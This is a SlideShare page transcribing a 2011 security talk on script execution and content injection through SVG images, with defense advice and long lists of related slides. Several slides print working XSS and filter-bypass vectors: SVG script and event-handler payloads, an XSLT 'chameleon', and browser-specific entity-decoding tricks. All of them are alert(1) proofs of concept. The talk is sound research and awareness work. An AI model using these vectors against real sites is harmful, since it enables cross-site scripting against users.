SlideShare ist ein Scribd-Unternehmen logo

The Image that called me - Active Content Injection with SVG Files

Mario Heiderich
Mario Heiderich
Technologie
1 von 29
Downloaden Sie, um offline zu lesen
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
Basic Example <svg xmlns=“http://www.w3.org/2000/svg“> <circle r=“40“ fill=“red“></circle> </svg>
SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
SVG in Action
Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
More Opera ● SVG via favicon
Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft

Empfohlen

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 

Empfohlen

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Intro to React
Intro to ReactIntro to React
Intro to ReactJustin Reock
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
WebAssembly Overview
WebAssembly OverviewWebAssembly Overview
WebAssembly OverviewAlexandr Skachkov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring SecurityDzmitry Naskou
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJSHoang Long
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Single Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJSSingle Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJSM R Rony
 
Angular Data Binding
Angular Data BindingAngular Data Binding
Angular Data BindingDuy Khanh
 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerBrian Hysell
 
Benefits of developing single page web applications using angular js
Benefits of developing single page web applications using angular jsBenefits of developing single page web applications using angular js
Benefits of developing single page web applications using angular jsHarbinger Systems - HRTech Builder of Choice
 
gRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at SquaregRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at SquareApigee | Google Cloud
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 

Weitere ähnliche Inhalte

Was ist angesagt?

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring SecurityDzmitry Naskou
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJSHoang Long
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Single Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJSSingle Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJSM R Rony
 
Angular Data Binding
Angular Data BindingAngular Data Binding
Angular Data BindingDuy Khanh
 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerBrian Hysell
 
gRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at SquaregRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at SquareApigee | Google Cloud
 

Was ist angesagt? (20)

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Intro to React
Intro to ReactIntro to React
Intro to React
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
 
WebAssembly Overview
WebAssembly OverviewWebAssembly Overview
WebAssembly Overview
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring Security
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJS
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Single Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJSSingle Page Application (SPA) using AngularJS
Single Page Application (SPA) using AngularJS
 
Angular Data Binding
Angular Data BindingAngular Data Binding
Angular Data Binding
 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A Primer
 
Benefits of developing single page web applications using angular js
Benefits of developing single page web applications using angular jsBenefits of developing single page web applications using angular js
Benefits of developing single page web applications using angular js
 
gRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at SquaregRPC: The Story of Microservices at Square
gRPC: The Story of Microservices at Square
 

Andere mochten auch

JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!Cameron Jones
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Bronson Quick
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordNik Cree
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Pascal Rettig
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Ariya Hidayat
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaRich Plakas
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWdivadwg
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Xavier Damman
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?정현 황
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016WP Engine
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile databaseChristian Melchior
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffCezary Podkul
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыNikolenko
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Wessel van Leeuwen
 

Andere mochten auch (19)

JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single word
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress Media
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWW
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile database
 
Danger Of Free
Danger Of FreeDanger Of Free
Danger Of Free
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuff
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работы
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18
 

Ähnlich wie The Image that called me - Active Content Injection with SVG Files

HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentTilak Joshi
 
JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3Helder da Rocha
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!Iker Jamardo
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?Mike Wilcox
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsBinary Studio
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptGjokica Zafirovski
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilityDennis Lembree
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)Shumpei Shiraishi
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2Graham Armfield
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2Graham Armfield
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Graham Armfield
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the WebCyril Concolato
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewArvind Krishnaa
 
Java script Session No 1
Java script Session No 1Java script Session No 1
Java script Session No 1Saif Ullah Dar
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsEngin Hatay
 

Ähnlich wie The Image that called me - Active Content Injection with SVG Files (20)

HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web Development
 
JavaONE 2012 Using Java with HTML5 and CSS3
